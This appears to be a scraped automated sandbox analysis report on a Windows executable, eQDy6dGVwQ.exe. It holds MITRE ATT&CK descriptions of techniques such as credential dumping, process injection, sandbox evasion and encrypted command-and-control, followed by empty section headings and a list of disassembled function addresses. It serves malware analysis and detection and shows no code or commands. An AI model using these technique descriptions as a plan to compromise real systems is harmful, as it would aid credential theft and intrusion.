Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Digital certificate logs, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report eQDy6dGVwQ.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Function 00410065, Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 158
stringCOMMON

Function 0040EBA3, Relevance: 22.9, APIs: 3, Strings: 10, Instructions: 174
registryCOMMON

Function 0040D3BE, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 142
encryptionstringCOMMON

Function 00404E73, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 107
filestringCOMMON

Function 004045FD, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 139
libraryloaderCOMMON

Function 00408AE5, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 77
filestringCOMMON

Function 004041A6, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 117
filestringCOMMON

Function 0040A712, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 116
stringencryptionCOMMON

Function 004051E3, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81
filestringCOMMON

Function 00402968, Relevance: 7.6, APIs: 5, Instructions: 61
COMMON

Function 0041051E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30
comCOMMON

Function 004105D6, Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Function 0040F984, Relevance: .1, Instructions: 59
COMMON

Function 004059A4, Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 76
registryCOMMON

Function 004020B9, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 172
registrystringCOMMON

Function 0040FE88, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 118
stringCOMMON

Function 00402C01, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82
COMMON

Function 0040668F, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149
registryCOMMON

Function 0040D072, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 147
registryCOMMON

Function 00407BBA, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 146
registryCOMMON

Function 0040DC62, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 133
registryCOMMON

Function 00407F0C, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 126
registryCOMMON

Function 004026DD, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 84
registryfileCOMMON

Function 0040504B, Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 83
COMMON

Function 0040E9F9, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 83
registryCOMMON

Function 004063FD, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 140
registryCOMMON

Function 00405F4C, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 121
registryCOMMON

Function 0040717C, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115
registryCOMMON

Function 0040D9FA, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115
registryCOMMON

Function 004073A7, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115
registryCOMMON

Function 004061E4, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 112
registryCOMMON

Function 00403BFF, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 112
networkstringCOMMON

Function 0040D5C0, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 108
registryCOMMON

Function 0040C823, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 101
COMMON

Function 004053C3, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 69
COMMON

Function 00403A78, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 134
stringCOMMON

Function 00406D4F, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 121
registryCOMMON

Function 00406B1B, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 110
registryCOMMON

Function 0040E237, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 97
registryCOMMON

Function 004078C8, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 89
registryCOMMON

Function 0040F81F, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 53
COMMON

Function 00407A7F, Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 100
stringCOMMON

Function 0040EF6C, Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 90
COMMON

Function 00404C51, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 148
COMMON

Function 0040491B, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90
registryCOMMON

Function 00408E0D, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83
registryCOMMON

Function 0040A875, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75
COMMON

Function 00409DCB, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 47
COMMON

Function 00409C3C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85
registryCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre